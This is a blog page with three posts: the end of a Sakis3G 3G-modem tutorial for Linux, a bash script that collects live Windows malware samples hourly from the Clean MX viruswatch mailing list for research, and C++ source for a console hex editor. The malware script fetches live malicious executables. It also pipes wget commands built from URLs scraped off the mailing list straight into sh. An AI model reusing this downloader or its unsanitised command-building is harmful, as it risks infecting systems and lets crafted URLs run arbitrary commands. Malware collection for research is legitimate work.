Notice my APN is all lower case and my username has a capital Z at the beginning; if my password were the same as my username, it would also have a capital Z at the beginning.
 
 
Now that we have all the information we need, let's reboot into Linux. Make sure you are not connected to anything before you start. Browse to where you downloaded Sakis3G and run these commands.

gunzip sakis3g.gz
chmod +x sakis3g
./sakis3g --interactive
 
 
 
Once you run the interactive GUI it will give you four options; pick option one and press Enter.
 
 
It will then ask you which interface; pick the first one like I have and press Enter.
 
 
Good, if you get this screen it means it has automatically found your APN, so all that is left to do is put in our username and password. Remember: the information is case sensitive.
 
 
 
 
Now you just get this message. When I first saw it I thought it was an error message, but what it was actually saying is that I was connected.
***NOTE***
The only way you'll know you're connected is with this message; it will not show up in your connection list in the Wicd manager.
 
 
That's it for this tutorial. If you have any questions, feel free to ask.
 

Thursday, November 15, 2012

Windows Malware samples Database Downloader Script[bash]



--- By nu11_()_v0!d
A Team OpenFire Production




Need a large number of malware samples for Windows?
Want to build your own malware database for research?
Here is a bash script I whipped up to download executables on an hourly basis from Clean MX's mailing list. It
places all samples in a folder I created in /usr/share/malware.

Name it windows_malware_database_TOF.sh

#!/bin/bash
rootdir="/usr/share/malware"
day=$(date +%Y%m%d)
base="http://lists.clean-mx.com/pipermail/viruswatch/$day/"

# The day's thread index lists each post as <A HREF="NNNN.html">[Virus ...]; take the
# newest [Virus post. Replacing the quotes with spaces makes the file name field 3.
filename=$(wget -qO - "${base}thread.html" | awk '/\[Virus/' | tail -n 1 | sed 's:": :g' | awk '{print $3}')
dirname="${filename%.html}"
url="$base$filename"

mkdir -p "$rootdir"
# Dump the post as text and keep only the lines describing samples (TR / exe entries).
links -dump "$url" | awk '/Up/' | grep "TR\|exe" | awk '{print $2,$8,$10,$11,$12"\n"}' > "$rootdir/$filename"

rm -rf "$rootdir/$dirname"
mkdir "$rootdir/$dirname"

cd "$rootdir" || exit 1

# Fetch every .exe URL (field 5 of the dump) and record a checksum for each sample.
grep "exe$" "$filename" | awk '{print "wget \""$5"\""}' | sh
ls *.exe | xargs md5sum >> checksums   # md5sum on Linux; the BSD/macOS tool is called md5
mv *.exe "$dirname"

rm -r "$rootdir"/*exe*
mv checksums "$rootdir/$dirname"
mv "$filename" "$rootdir/$dirname"
 
Use it for your fruitful research!!!!
Suggestions welcome!!!

Tuesday, September 25, 2012

A PRIVATE HEX EDITOR CODED ON C++


COMPILE AND RUN


1. Main.cpp
Code:
    #include "Editor.hpp"
     
    Console console;
    HexEditor hexedit;
    bool quit = false;
    void draw();
    void loop();
    void processInput(char key);
     
    int main() {
        loop();
        return 0;
    }
     
    void loop() {
        console.init("Psych Hex Editor - Created by Psych.gs");
        draw();
        char input;
        while (!quit) {
            input = getch();
            processInput(input);
            draw();
        }
    }
     
    void draw() {
        console.clear();
        console.write(0,23,"Keys: ESC = Exit  ENTER = Open File  WASD = Navigate Tab = Edit  Z = Save",FOREGROUND_GREEN|BACKGROUND_BLUE);
        console.write(0,24,"Q = Scrolldown E = Scrollup Space = Switch View F = Find",FOREGROUND_BLUE|BACKGROUND_GREEN);
        hexedit.draw(&console);
        console.render();
    }
     
    void processInput(char key) {
        if (key == VK_TAB) {
            hexedit.go_edit(&console);
        }
        if (key == VK_ESCAPE) {
            quit = true;
        }
        if (key == VK_RETURN) {
            hexedit.load_file();
        }
        if (key == 'd' || key == 'D') {
            hexedit.select(1);
        }
        if (key == 'a' || key == 'A') {
            hexedit.select(-1);
        }
        if (key == 's' || key == 'S') {
            hexedit.select(16);
        }
        if (key == 'w' || key == 'W') {
            hexedit.select(-16);
        }
        if (key == 'q' || key == 'Q') {
            hexedit.scroll(1);
        }
        if (key == 'e' || key == 'E') {
            hexedit.scroll(-1);
        }
        if (key == 'z' || key == 'Z') {
            hexedit.save();
        }
        if (key == 'f' || key == 'F') {
            hexedit.find(&console);
        }
        if (key == VK_SPACE) {
            hexedit.switchmodes();
        }
    }
    
2. Editor.hpp

Code:
    #include <windows.h>   // HANDLE, CHAR_INFO, console and MessageBox APIs
    #include <conio.h>     // getch()
    #include <cstdio>      // sprintf()
    #include <cstring>     // strlen()
     
    void error(const char *msg);
     
    class Console {
    private:
        CHAR_INFO console_buffer[25][80];
        HANDLE cHandle;
    public:
        void init(const char *title);
        void write(int x, int y, const char *c, WORD attributes);
        void render();
        void clear();
    };
     
    struct Editable {
        short x;
        int y;
        char data;
    };
     
    class HexEditor {
    private:
        char fname[64];
        char completePath[255];
        long fsize;
        bool hasFile;
        char *fileByte;
        Editable *edit;
        Editable *strEdit;
        long selected,lc;
        int sTimes;
        long scrollAmount;
        void gen_edit();
        void grab_file_info();
        void findandselect(const char *find);
        void findtext(Console *g);
        void findbytes(Console *g);
        void converttobytes(char *bytebuf, const char *text);
        bool startsWith(const char *c1,const char *c2);
        short mode;
    public:
        // The class had no constructor, so hasFile, mode, selected and the buffer
        // pointers were read before anything had set them.
        HexEditor() : fsize(0), hasFile(false), fileByte(NULL), edit(NULL), strEdit(NULL),
                      selected(0), lc(0), sTimes(0), scrollAmount(0), mode(0), editMode(false) {
            fname[0] = '\0';
            completePath[0] = '\0';
        }
        ~HexEditor() {
            free(fileByte);
            free(edit);
        }
        void draw(Console *g);
        void load_file();
        void select(int add);
        void scroll(int add);
        void switchmodes();
        void go_edit(Console *g);
        void save();
        void find(Console *g);
        bool editMode;
    };
    

3. Editor.cpp

Code:
    #include "Editor.hpp"
     
    void m(const char *m) {
        MessageBoxA(0,m,m,0);
    }
     
    void error(const char *msg) {
        MessageBoxA(0,msg,"Psych Hex Editor|Error",0);
    }
     
    void Console::init(const char* title) {
        cHandle = (HANDLE)GetStdHandle(STD_OUTPUT_HANDLE);
        if (cHandle == INVALID_HANDLE_VALUE) {
            error("Invalid handle value of std output handle.");
        }
        SetConsoleTitle(title);
    }
     
    void Console::clear() {
        for (int x = 0; x < 80; x++) {
            for (int y = 0; y < 25; y++) {
                console_buffer[y][x].Char.AsciiChar = '\0';
                console_buffer[y][x].Attributes = FOREGROUND_GREEN | BACKGROUND_BLUE;
            }
        }
    }
     
    void Console::write(int x, int y, const char *c, WORD attributes) {
        // clip to the 80x25 buffer: a long prompt (e.g. a 60-character search string
        // on row 24) would otherwise write past the end of console_buffer
        if (y < 0 || y >= 25 || x < 0) {
            return;
        }
        int len = strlen(c);
        for (int i = 0; i < len && x+i < 80; i++) {
            console_buffer[y][x+i].Char.AsciiChar = c[i];
            console_buffer[y][x+i].Attributes = attributes;
        }
    }
     
    void Console::render() {
        COORD size = {80,25};
        COORD pos = {0,0};
        SMALL_RECT region = {0,0,79,24};
        WriteConsoleOutput(cHandle,(CHAR_INFO*)console_buffer,size,pos,&region);
    }
     
    void HexEditor::draw(Console *g) {
        char outBuf[80];
        if (hasFile) {
            snprintf(outBuf,sizeof(outBuf),"%s %.2f kb",fname,(float)fsize/1024);
        } else {
            snprintf(outBuf,sizeof(outBuf),"No File Loaded");
        }
        g->write(0,0,outBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        char out[4];
        scrollAmount = sTimes*16;
        if (hasFile) {
            // 304 bytes = 19 rows of 16 fit on screen; stop there instead of walking the whole file
            for (lc = 0; lc < 304 && lc+scrollAmount < fsize; lc++) {
                switch (mode) {
                    case 0:
                        // cast to unsigned char: a plain char >= 0x80 is sign-extended by %x,
                        // prints as "xffffffXX" and overflows the 4-byte buffer
                        snprintf(out,sizeof(out),"x%02x",(unsigned char)edit[lc+scrollAmount].data);
                        break;
                    case 1:
                        snprintf(out,sizeof(out),"%c",edit[lc+scrollAmount].data);
                        break;
                }
                if (selected == lc+scrollAmount) {
                    if (editMode) {
                        g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,FOREGROUND_BLUE|FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_INTENSITY);
                    } else {
                        g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,FOREGROUND_BLUE|FOREGROUND_RED|FOREGROUND_GREEN);
                    }
                } else {
                    g->write(edit[lc+scrollAmount].x,edit[lc+scrollAmount].y-sTimes,out,BACKGROUND_BLUE|BACKGROUND_RED|BACKGROUND_GREEN);
                }
            }
        }
    }
     
    void HexEditor::select(int add) {
        if (!hasFile || selected+add < 0 || selected+add >= fsize) {
            return;
        }
        selected += add;
    }
     
    void HexEditor::scroll(int add) {
        if (!hasFile || sTimes+add < 0 || sTimes+add > (fsize-288)/16) {
            return;
        }
        sTimes += add;
    }
     
    void HexEditor::switchmodes() {
        // toggle between hex view (0) and text view (1); the display table is
        // regenerated in place rather than re-allocated on every switch
        mode = (mode == 0) ? 1 : 0;
        if (hasFile) {
            gen_edit();
        }
    }
     
    void HexEditor::load_file() {
        OPENFILENAME ofn;
        ZeroMemory(&ofn,sizeof(ofn));
        ofn.lStructSize = sizeof(OPENFILENAME);
        ofn.lpstrFilter = "All Files (*.*)\0*.*\0";
        completePath[0] = '\0';                 // lpstrFile must start empty or hold a valid initial name
        ofn.lpstrFile = completePath;
        ofn.nMaxFile = sizeof(completePath);
        ofn.Flags = OFN_EXPLORER | OFN_FILEMUSTEXIST;
        ofn.lpstrDefExt = "";
       
        if (GetOpenFileName(&ofn)) {
            grab_file_info();                   // sets hasFile only once the read succeeded
        }
    }
     
    void HexEditor::grab_file_info() {
        FILE *fp = fopen(completePath,"rb");
        if (fp == NULL) {
            error("Could not open the selected file.");
            return;
        }
        SHFILEINFOA sfi = {0};
        SHGetFileInfoA(completePath,0,&sfi,sizeof(sfi),SHGFI_DISPLAYNAME);
        snprintf(fname,sizeof(fname),"%s",sfi.szDisplayName);
        fseek(fp,0,SEEK_END);
        fsize = ftell(fp);
        fseek(fp,0,SEEK_SET);
        // release the buffers of a previously loaded file instead of leaking them
        if (hasFile) {
            free(fileByte);
            free(edit);
        }
        size_t n = (fsize > 0) ? (size_t)fsize : 1;
        fileByte = (char*)malloc(n);
        edit = (Editable*)malloc(sizeof(Editable)*n);
        if (fileByte == NULL || edit == NULL) {
            error("Out of memory while loading the file.");
            fclose(fp);
            hasFile = false;
            return;
        }
        if (fread(fileByte,1,fsize,fp) != (size_t)fsize) {
            error("Could not read the whole file.");
        }
        fclose(fp);
        hasFile = true;
        selected = 0;
        sTimes = 0;
        gen_edit();
    }
     
    void HexEditor::gen_edit() {
        // fills the per-byte display table; the table itself is allocated once in grab_file_info()
        short currX = 0;
        int currY = 3;
        for (lc = 0; lc < fsize; lc++) {
            unsigned char b = (unsigned char)fileByte[lc];
            if (mode == 1 && (b < 0x20 || b > 0x7E)) {
                edit[lc].data = ' ';            // non-printable bytes show as blanks in text view
            } else {
                edit[lc].data = fileByte[lc];
            }
            edit[lc].x = currX;
            edit[lc].y = currY;
            if (currX != 75) {
                currX += 5;                     // 16 columns, 5 cells apart
            } else {
                currY++;
                currX = 0;
            }
        }
    }
     
    void HexEditor::go_edit(Console *g) {
        if (!hasFile) {
            return;
        }
        editMode = true;
        if (mode == 0) {
            // two keystrokes build "0x??"; the buffer is NUL-terminated so sscanf never
            // reads past the digits typed so far, and %x is parsed into an unsigned int
            // (the original scanned into a short, which %x overruns)
            char c[5] = {'0','x','\0','\0','\0'};
            unsigned int hex = 0;
            g->clear();
            g->write(0,24,"Please enter a valid hexadecimal number-",FOREGROUND_GREEN|BACKGROUND_BLUE);
            draw(g);
            g->render();
            c[2] = (char)getch();
            if (!isxdigit((unsigned char)c[2])) {
                editMode = false;
                return;
            }
            sscanf(c,"%x",&hex);
            edit[selected].data = (char)hex;        // preview the first nibble
            g->clear();
            g->write(0,24,"Please enter a valid hexadecimal number-",FOREGROUND_GREEN|BACKGROUND_BLUE);
            draw(g);
            g->render();
            c[3] = (char)getch();
            if (isxdigit((unsigned char)c[3])) {    // the original re-tested c[2] here
                sscanf(c,"%x",&hex);
                edit[selected].data = (char)hex;
                fileByte[selected] = (char)hex;
            } else {
                edit[selected].data = fileByte[selected];   // drop the half-typed preview
            }
            editMode = false;
            return;
        }
        if (mode == 1) {
            g->clear();
            g->write(0,24,"Please enter a new character-",FOREGROUND_GREEN|BACKGROUND_BLUE);
            draw(g);
            g->render();
            int c = getch();
            if (c > 0x19 && c < 0x7F) {             // printable ASCII only
                edit[selected].data = (char)c;
                fileByte[selected] = (char)c;
            }
            editMode = false;
        }
    }
     
    void HexEditor::save() {
        if (!hasFile) {
            return;
        }
        OPENFILENAME ofn;
        char sfilePath[255];
        sfilePath[0] = '\0';                    // lpstrFile must start empty
        ZeroMemory(&ofn,sizeof(ofn));
        ofn.lStructSize = sizeof(OPENFILENAME);
        ofn.lpstrFilter = "All Files (*.*)\0*.*\0";
        ofn.lpstrFile = sfilePath;
        ofn.nMaxFile = sizeof(sfilePath);
        ofn.Flags = OFN_EXPLORER | OFN_PATHMUSTEXIST;
        ofn.lpstrInitialDir = completePath;
        ofn.lpstrDefExt = "";
        if (GetSaveFileName(&ofn)) {
            FILE *fp = fopen(sfilePath,"wb");
            if (fp == NULL) {
                error("Could not open the file for writing.");
                return;
            }
            if (fwrite(fileByte,1,fsize,fp) != (size_t)fsize) {
                error("Could not write the whole file.");
            }
            fclose(fp);
        }
    }
     
    void HexEditor::findbytes(Console *g) {
        char texBuf[255],text[64],bytes[24];
        memset(text,'\0',64);
        short currLen = 0;
        sprintf(texBuf,"Please enter bytes to find(FORMAT=0x??,0x??)->");
        g->clear();
        g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
        g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        draw(g);
        g->render();
        bool end = false;
        int in;
        while (!end) {
            in = getch();
            if (in == VK_ESCAPE) {
                end = true;
            } else {
                if (in == VK_BACK) {
                    if (currLen != 0) {
                        text[currLen-1] = '\0';
                        currLen--;
                    }
                } else {
                    // keep one byte free for the terminator; the original had no bound here
                    if (in != VK_RETURN && currLen < (short)sizeof(text)-1) {
                        text[currLen] = (char)in;
                        currLen++;
                    }
                }
                sprintf(texBuf,"Please enter bytes to find(FORMAT=0x??,0x??)->%s",text);
                // search after every complete "0x??," group
                if (currLen > 0 && currLen%5 == 0) {
                    converttobytes(bytes,text);
                    findandselect(bytes);
                }
                g->clear();
                g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
                g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
                draw(g);
                g->render();
            }
        }
    }
     
    void HexEditor::converttobytes(char *bytebuf, const char* text) {
        // parses "0x41,0x42,..." into raw bytes; the result is NUL-terminated because
        // findandselect() measures it with strlen (so 0x00 cannot be part of a pattern)
        char currBytebuf[8];
        short currByte = 0,currBB = 0;
        int sLen = strlen(text);
        for (int i = 0; i <= sLen; i++) {
            if (i < sLen && text[i] != ',') {
                if (currByte < (short)sizeof(currBytebuf)-1) {
                    currBytebuf[currByte++] = text[i];   // the original never advanced this index
                }
            } else {
                // end of one "0x??" token (comma or end of string): convert it
                currBytebuf[currByte] = '\0';
                unsigned int in;
                if (currByte > 0 && sscanf(currBytebuf,"%x",&in) == 1 && currBB < 23) {
                    bytebuf[currBB++] = (char)in;        // 23 leaves room for the terminator in bytes[24]
                }
                currByte = 0;
            }
        }
        bytebuf[currBB] = '\0';
    }
     
    void HexEditor::findtext(Console *g) {
        char texBuf[255],text[64];
        memset(text,'\0',64);
        short currLen = 0;
        sprintf(texBuf,"Please enter text to find->");
        g->clear();
        g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
        g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
        draw(g);
        g->render();
        bool end = false;
        int in;
        while (!end) {
            in = getch();
            if (in == VK_ESCAPE) {
                end = true;
            } else {
                if (in == VK_BACK) {
                    if (currLen != 0) {
                        text[currLen-1] = '\0';
                        currLen--;
                    }
                } else {
                    // keep one byte free for the terminator; the original had no bound here
                    if (in != VK_RETURN && currLen < (short)sizeof(text)-1) {
                        text[currLen] = (char)in;
                        currLen++;
                    }
                }
                sprintf(texBuf,"Please enter text to find->%s",text);
                findandselect(text);
                g->clear();
                g->write(0,23,"Press escape to exit find",FOREGROUND_GREEN|BACKGROUND_BLUE);
                g->write(0,24,texBuf,FOREGROUND_RED|FOREGROUND_GREEN|FOREGROUND_BLUE|FOREGROUND_INTENSITY|BACKGROUND_BLUE);
                draw(g);
                g->render();
            }
        }
    }
     
    void HexEditor::find(Console* g) {
        switch (mode) {
            case 0:
                findbytes(g);
                break;
            case 1:
                findtext(g);
                break;
        }
    }
     
    void HexEditor::findandselect(const char *find) {
        int flen = strlen(find);
        if (!hasFile || flen == 0) {
            return;
        }
        // compare in place and stop flen bytes before the end, so no read runs past fileByte
        // (the original copied fileByte[lc+i] without checking lc+i against fsize)
        for (lc = selected; lc + flen <= fsize; lc++) {
            if (memcmp(fileByte+lc,find,flen) == 0) {
                selected = lc;
                sTimes = ((lc-288)/16 < 0) ? 0 : (int)((lc-288)/16);   // scroll so the match is visible
                return;
            }
        }
    }